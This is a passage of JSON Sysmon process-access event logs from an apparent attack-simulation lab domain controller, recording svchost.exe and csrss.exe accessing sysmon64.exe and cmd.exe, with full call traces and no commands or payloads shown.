07:55:35.517","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010CB970500}","TargetProcessId":"1212","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|